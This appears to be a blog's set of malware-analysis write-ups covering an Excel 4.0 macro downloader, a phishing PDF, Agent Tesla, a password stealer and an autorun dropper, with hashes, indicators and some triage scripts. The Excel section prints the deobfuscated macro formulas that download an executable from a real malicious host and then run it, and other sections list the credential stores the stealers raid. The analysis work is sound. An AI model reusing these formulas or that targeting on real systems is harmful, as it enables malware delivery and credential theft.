Excel 4.0 macro Trojan Downloader – Malware Analysis

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60

I came across this sample on VirusBay.io. I downloaded this malicious Excel file to my VM for malware analysis.

OLEVBA.py

The first thing I did was analyze the VBA macro source code in the Excel file using OLETools.

Command > OLEVBA.py -a <.xls file>

The result shows that the macro will auto-execute when the file is opened, that it may run an executable file, possibly using a shell command, and that it will download a file from a remote server. The executable file name is FBpKzqF.exe.

Document Property:

An XLM macro has been used in this file, and it is hidden.

Steps To Make Macros Sheet Visible

Step 1

I enabled it by right-clicking on the spreadsheet that is open in Excel and selecting Unhide…

A popup then shows the name of the spreadsheet to select to unhide. Here the name of the sheet is SODXOFScMLy.

Step 2

Along with this, the Excel file needs to be unblocked, which can be done by right-clicking the Excel file > General tab > checking the Unblock option. I ran OLEVBA to check the visibility status of the macro, and it had now turned to visible.

While going through the spreadsheet, I searched for the keywords that I had found in the macro extracted using the OLEVBA tool.

The macro extracted by OLEVBA shows a string value of C:\ProgramData\FBpKzqF.exe

So I looked for .exe in the spreadsheet. I was sure I would find something here, and I found a link to a website, http:// gstat.dondyablo .com/ fattura.exe; here fattura.exe is just an HTML page. (VirusTotal link here)

Verification of the above URL on VirusTotal shows that the URL is up and malicious, with a score of 17/79.

I also did an NSLookup for the URL. There are three IPs assigned to this site: the first two are from Russia and the third one is from the Netherlands.

Next I started looking for formulas and CALL functions in the columns, as I had seen them in the macro extracted by olevba.py.

I started with a CALL function: right-click and run this CALL function.

Click on Step in.

Clicking Evaluate evaluates the values of the parameters of the call.

Post Evaluation

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)

Here the values are:

$BZ$118 = “URLMON”

$HT$559 = “URLDownloadToFileA”

$BB$54 = “http:// gstat.dondyablo .com/ fattura.exe”

$GI$1024 = “C:\ProgramData\FBpKzqF.exe”

=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe",
"C:\ProgramData\FBpKzqF.exe",0,0)

There is another CALL function, which I am evaluating to get its values.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)

$H$24 = “Shell32”

$GD$694 = “ShellExecuteA”

$I$1161 = “open”

$GI$1025 = “C:\ProgramData\FBpKzqF.exe”

=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,
"open","C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two CALL functions, I can say:

  • The first CALL function will download the executable file from the URL.
  • The second CALL function will execute the executable file on the victim's machine.
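The manual Evaluate steps above can be scripted for triage. The following is an added example, not code from the original post: it substitutes cell references into the two CALL formulas and reports a file path that one call downloads and another executes. The cell map is constructed from the formulas' own references, the URL is a placeholder, and the function names are hypothetical.

```python
import re

# Constructed cell map using the formulas' own references; the URL is a
# placeholder (assumption), not the sample's address.
CELLS = {
    "BZ118": "URLMON", "HT592": "URLDownloadToFileA",
    "BB54": "http://payload.example.invalid/fattura.exe",
    "GI1025": r"C:\ProgramData\FBpKzqF.exe",
    "H24": "Shell32", "GD694": "ShellExecuteA", "I1161": "open",
}
FORMULAS = [
    '=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)',
    '=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)',
]
# (DLL, export) pairs worth flagging and what each one does with a file path.
FLAGGED = {("urlmon", "urldownloadtofilea"): "download",
           ("shell32", "shellexecutea"): "execute"}

def split_args(formula):
    """Split the arguments of =CALL(...) on commas that are outside quotes."""
    m = re.fullmatch(r"=CALL\((.*)\)", formula.strip(), re.I | re.S)
    if not m:
        raise ValueError("not a CALL formula")
    # A comma followed by an even number of quotes lies outside any string.
    return [a.strip() for a in re.split(r',(?=(?:[^"]*"[^"]*")*[^"]*$)', m.group(1))]

def resolve_call(formula, cells):
    """Substitute A1-style references ($BZ$118) with their cell values."""
    out = []
    for arg in split_args(formula):
        ref = arg.replace("$", "").upper()
        is_ref = re.fullmatch(r"[A-Z]{1,3}\d+", ref)
        out.append(cells.get(ref, f"<unresolved {ref}>") if is_ref else arg.strip('"'))
    return out

def triage(formulas, cells):
    """Return (findings, paths that one CALL downloads and another executes)."""
    written, run, findings = set(), set(), []
    for f in formulas:
        dll, func, _types, *params = resolve_call(f, cells)
        kind = FLAGGED.get((dll.lower(), func.lower()))
        if kind:  # in both APIs the file path is the third argument
            (written if kind == "download" else run).add(params[2].lower())
        findings.append((dll, func, kind))
    return findings, written & run
```

A non-empty second return value is the download-then-execute chain described in the two bullets above.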

Next, as a test, I will enable Internet on my VM and run the first CALL function instead of stepping in, which will download the executable.

Network Log:

The network log shows a connection made to IP address 195. 22. 152. 76, and the IP address resolved to DNS name gstat. dondyablo .com

The downloaded file is an MS-DOS application.

The URL is hosted on an Apache server, and the host server runs Ubuntu.

Process Explorer:

Process Explorer captures the TCP connection with the remote IP address and the download of the executable file to two locations:

  • C:\ProgramData\FBpKzqF.exe
  • C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (temp location)

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70

Summary

  • The Excel file contains an Excel 4.0 macro in a hidden spreadsheet (SODXOFScMLy).
  • The macro's CALL functions download the executable FBpKzqF.exe.
  • The executable is downloaded from “http:// gstat.dondyablo .com/ fattura.exe”.
  • The downloaded executable file is trojan malware.

PDF malware analysis

Hash: d26a7e67cda125f11270af0a820f6644cf920ed70fd5b166e82757dabb6d1ee0

Download sample link: Here

File type: PDF

VirusTotal score: 27/54


PDFiD

I used the PDFiD tool to analyse the header of the PDF file. I observed that the file contains 24 URLs.

The next step is to extract the URLs from the document. I will use two tools to do this, pdf-parser and PDFStreamDumper.

pdf-parser

I am using the pdf-parser tool to extract only the list of URLs from this document. For that, I navigate to the pdf-parser folder and execute the command below. pdf-parser is a Python script.

pdf-parser.py -k /URI <.pdf file> 

These 5 URLs were extracted from the PDF document.

(http://www.diamondcreationslb . com/doc/rdd.htm)
(http://ruseuropharm . ru/tobi/index.php)
(http://tcil-bd . com/tin-count/zigi/index.php)
(http://tcil-bd . com/wp-includes/IXR/alen/index.php)
(http://tcil-bd . com/dfp/index.php)
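To show what a /URI search does under the hood, here is an added example (not part of the original post and not pdf-parser's code) that pulls /URI targets out of raw PDF bytes, counts repeats so that many link annotations collapse to a few distinct URLs, and defangs them for a report. The PDF fragment and its example.invalid hosts are constructed, and the function names are hypothetical.

```python
import re
from collections import Counter

# Constructed PDF fragment (not the sample): link annotations whose /URI values
# are a literal string (twice), a literal with escaped parentheses, and a hex string.
_LINK = b"%d 0 obj\n<< /Type /Annot /Subtype /Link /A << /S /URI /URI %s >> >>\nendobj\n"
SAMPLE = b"".join(_LINK % (n, v) for n, v in [
    (5, b"(http://login.example.invalid/index.php)"),
    (6, b"(http://login.example.invalid/index.php)"),
    (7, b"(http://a.example.invalid/x\\(1\\).htm)"),
    (8, b"<" + b"http://b.example.invalid/".hex().encode() + b">"),
])

# "/URI" followed by a literal string "(...)" or a hex string "<...>".
URI_RE = re.compile(rb"/URI\s*(?:\(((?:\\.|[^\\()])*)\)|<([0-9A-Fa-f\s]*)>)", re.S)

def extract_uris(pdf_bytes):
    """Count each distinct /URI target in uncompressed PDF bytes, in file order."""
    found = Counter()
    for m in URI_RE.finditer(pdf_bytes):
        if m.group(2) is not None:                    # hex string
            digits = re.sub(rb"\s+", b"", m.group(2)).decode("ascii")
            raw = bytes.fromhex(digits + "0" * (len(digits) % 2))
        else:                                         # literal string
            raw = re.sub(rb"\\([()\\])", rb"\1", m.group(1))
        found[raw.decode("latin-1")] += 1
    return found

def defang(uri):
    """Make a URL non-clickable for reports: hxxp scheme and [.] in the host."""
    scheme, sep, rest = uri.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("tt", "xx") + sep + host.replace(".", "[.]") + slash + path
```

This scan only sees objects stored uncompressed; URIs inside compressed streams have to be inflated first.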

PDFStreamDumper

PDFStreamDumper is a very handy tool with a GUI. It loads all objects in the PDF file and shows them in text and hex format. Opening the malicious PDF file in PDFStreamDumper, I can see the URLs under the objects. To get all the URLs, I have to go through all the objects in the left panel one by one.

URL Verification

http://www.diamondcreationslb . com/doc/rdd.htm

Report: Phishing

http://ruseuropharm . ru/tobi/index.php

Report: Phishing

Status: 404


http://tcil-bd . com/tin-count/zigi/index.php

Report: Phishing

Status: 404


http://tcil-bd . com/wp-includes/IXR/alen/index.php

Report: Phishing

Status: 404


http://tcil-bd . com/dfp/index.php

Report: Phishing

Status: 404

Summary:

  • The PDF file has URLs embedded.
  • All URLs are phishing.

Trojan Agent Tesla – Malware Analysis

Hash – 077f75ef7fdb1663e70c33e20d8d7c4383fa13fd95517fab8023fce526bf3a25

Family : Agent Tesla

Downloaded Sample Link: Click here

Signature: Microsoft Visual C# v7.0/ Basic.NET

Filename: UIhLdVHHlUAKoEOpjVAsXFlIQrgS.exe

VirusTotal score:

Malware behavior:

  • Steal browser information (URL, Usernames, Passwords)
  • Steal passwords for email clients.
  • Steal FTP client credentials.
  • Steal download manager passwords.
  • Collect OS and hardware information.

Browser Information:

When I debugged the malware executable, it initially created a SQLite database to store the information collected from the victim's machine.

Below are the tables that get created.

Tables created:

  • meta
  • logins
  • sqlite_sequence
  • stats
  • compromised_credentials

I found it collected browser data (Google Chrome), which includes accessed URLs and the related usernames and passwords.

The database table logins stores all browser-related information. Below are the table columns.

Apart from this, the malware also looks for many different types of browsers to steal data from.

It looks for the browsers below:

  • Opera Browser
  • Yandex Browser
  • 360 Browser
  • Iridium Browser
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • CentBrowser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • Citrio
  • Liebao Browser
  • Sleipnir 6
  • QIP Surf
  • Coowon

The malware also looks for the email clients below. I hadn't installed any of them on my machine while analyzing this.

Email Clients:

  • Outlook
  • Thunderbird
  • Foxmail
  • Opera Mail
  • Pocomail
  • Claws-mail
  • Postbox

FTP Clients:

The malware grabs credentials from FTP clients as well. List below.

  • FileZilla
  • Core FTP
  • SmartFTP
  • FTPGetter
  • FlashFXP

It also makes an FTP web request. (The remote server couldn't be found.)

It uses an SMTP client to send information over the network using port 587, which indicates sending data from the SMTP client to a particular SMTP server through mail attachments.

The malware executable also makes an HTTPWebRequest, which must be downloading an SMTP client to transfer data to the remote SMTP server.

Unfortunately, it didn't make any connection to any remote server address.

Summary:

  • Steal browser information including URLs, usernames and passwords.
  • Steal email client credentials.
  • Steal credentials of FTP servers.
  • Computer information.

Thank you.

Password stealer Trojan – Malware Analysis

Hi Visitor, I got this sample of malware shared on VirusBay.

Sample below:

SHA256: 630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad

Signature: Microsoft Visual C# v7.0/ Basic .Net, and it's a Windows Forms application.

Upon execution, this file drops the two files below at location C:\Users\<UserProfile>\AppData\Local\Temp\

Dropped files:

C:\Users\<UserProfile>\AppData\Local\Temp\FB_2C02.tmp.exe

C:\Users\<UserProfile>\AppData\Local\Temp\cc3a68ce1dad95ce662e1c51568e3a.exe (Application Server)

Upon execution, this file takes a screenshot of the current screen and saves it at the C:\Users\<UserProfile>\AppData\Local\Temp location.

It also adds the files below to the startup programs.

  • cc3a68ce1dad95ce662e1c51568e3a.exe (Application Server)
  • And the main malware sample file.

FB_2C02.tmp.exe:

SHA256: A02CF7E4D01C3E04C0C6F723A541289A12C5D87ECC47F6B675D84A6B1B0A23B3

File description: Gomorrah

Signature: Microsoft Visual C# v7.0/ Basic .Net, and it's a Windows Forms application.

I used the ILSpy decompiler to decompile FB_2C02.tmp.exe. I could see the functions written to achieve the purposes below.

Purpose:

  1. Steal browser saved user account information.

I used Google Chrome on the VM on which I was doing the analysis. I could see this file had created a Passwords.txt file at C:\Users\<UserProfile>\AppData\Local\Temp\Passwords.txt

Decompiled code of the executable that grabs the Google Chrome URL, username and password.

2. System Information.

This file is also located at C:\Users\<UserProfile>\AppData\Local\Temp

3. Outlook Password.

This file is also located at C:\Users\<UserProfile>\AppData\Local\Temp. As I wasn't using Outlook, the file was empty.

4. Credit Card information

The file CC.txt, which stores information about CC, is also located at C:\Users\<UserProfile>\AppData\Local\Temp.

It was empty too.

The code below grabs CC information from the browser.

Not just from Google Chrome but from all of the below:

  • Amigo
  • Brave
  • Kometa
  • Orbitum
  • Torch
  • Yandex

It uploads everything collected to the remote location, though I am not able to see it connecting to the remote server anymore because when I ran this, I got runtime exceptions.

But it connects to the URL below, as mentioned in the VirusTotal detection.

Summary:

The malware uploads the information below to a remote server.

  • Web account passwords from web browsers.
  • Credit card information from web browser.
  • Outlook passwords.
  • Client machine information.

Thank you.

Trojan dropper bdf243b7a296f7aecc366c799e3fb865ee3aff7c72d8d942e2b2632a347fe5c3

SHA256: bdf243b7a296f7aecc366c799e3fb865ee3aff7c72d8d942e2b2632a347fe5c3

I downloaded this sample from Malshare.

I started by decoding the PE hex to a text file and found that the PE file has another file embedded, which will be dropped on execution.

Filename: help.exe

SHA256: 837bef64239be017a2aac92852576efc7d84774d90f64e9d69c5cc3a2b4ecce4

It also drops the Autoexec.bat.exe and Autoexec.exe files at the C:\ location. (But it didn't drop these files; instead it dropped AutoRun.INF and AutoRun.exe.)

I also found the computer username emartinez in the path to the PDB file, which means this file must have been compiled on a machine under this user account, and the username janettedoe in another path to startup programs.
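A PDB path like the one mentioned above sits in the PE's CodeView debug record, so it can be recovered without reading hex by eye. The following is an added example, not part of the original post: a heuristic signature scan (not a full debug-directory parser) that returns embedded PDB paths and the Windows profile name in each. The sample bytes, the username builduser and the function names are constructed for illustration.

```python
import re
import struct

# Constructed stand-in for a PE image (not the sample): filler bytes followed by
# a CodeView RSDS record = "RSDS" + 16-byte GUID + 4-byte age + NUL-terminated path.
SAMPLE = (b"MZ" + b"\x90" * 64 + b"RSDS" + bytes(range(16)) + struct.pack("<I", 1)
          + rb"C:\Users\builduser\Projects\demo\Release\demo.pdb" + b"\0" + b"\xcc" * 8)

# Offset from the record signature to the path: RSDS = 4+16+4, NB10 = 4+4+4+4.
PATH_OFFSET = {b"RSDS": 24, b"NB10": 16}

def pdb_paths(image):
    """Heuristic scan for CodeView debug records; returns the embedded PDB paths."""
    paths = []
    for m in re.finditer(rb"RSDS|NB10", image):
        start = m.start() + PATH_OFFSET[m.group()]
        end = image.find(b"\0", start)
        path = image[start:end].decode("utf-8", "replace") if end != -1 else ""
        if path.lower().endswith(".pdb") and len(path) < 260:   # drop false hits
            paths.append(path)
    return paths

def build_user(path):
    """Return the profile name if the path sits under a Windows user directory."""
    m = re.search(r"\\(?:Users|Documents and Settings)\\([^\\]+)\\", path, re.I)
    return m.group(1) if m else None
```

The path is whatever the build machine wrote and can be edited or stripped, so a recovered username is a lead for clustering samples rather than proof of authorship.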

I executed this PE file for dynamic analysis. I found that this file dropped HelpMe.exe and AutoRun.INF at the same locations I had seen in the hex code.

Files Dropped:

  1. C:\Windows\System32\HelpMe.exe
  2. C:\AutoRun.INF
  3. C:\AutoRun.exe

AUTORUN.INF file at location C:\

The AUTORUN.INF file executes the executable AutoRun.exe.

Another executable is dropped at the locations below:

C:\$Recycle.Bin\S-1-5-18

C:\$Recycle.Bin\S-1-5-21-3461203602-4096304019-2269080069-100

I renamed the C:\$Recycle.Bin\S-1-5-18\desktop.ini file to desktop.ini.exe and double-clicked it to execute it. It gave the error Cannot create file “C:\Windows\System32\HelpMe.exe”

Then I executed the desktop.ini.exe file with administrative privileges (before executing this file I had commented the AutoRun.exe file at location C:\), and this file executed C:\Windows\System32\HelpMe.exe, which dropped the file AutoRun.exe at location C:\

I disassembled the AutoRun.exe file and found that it creates the file Soft.lnk, which again has a path to execute HelpMe.exe on Windows startup.

The Soft.lnk file has the comment “Stone, I hate you!”; this file's target is to execute AUTORUN.INF.exe

No internet connectivity was tested for this malware, as this analysis was done offline.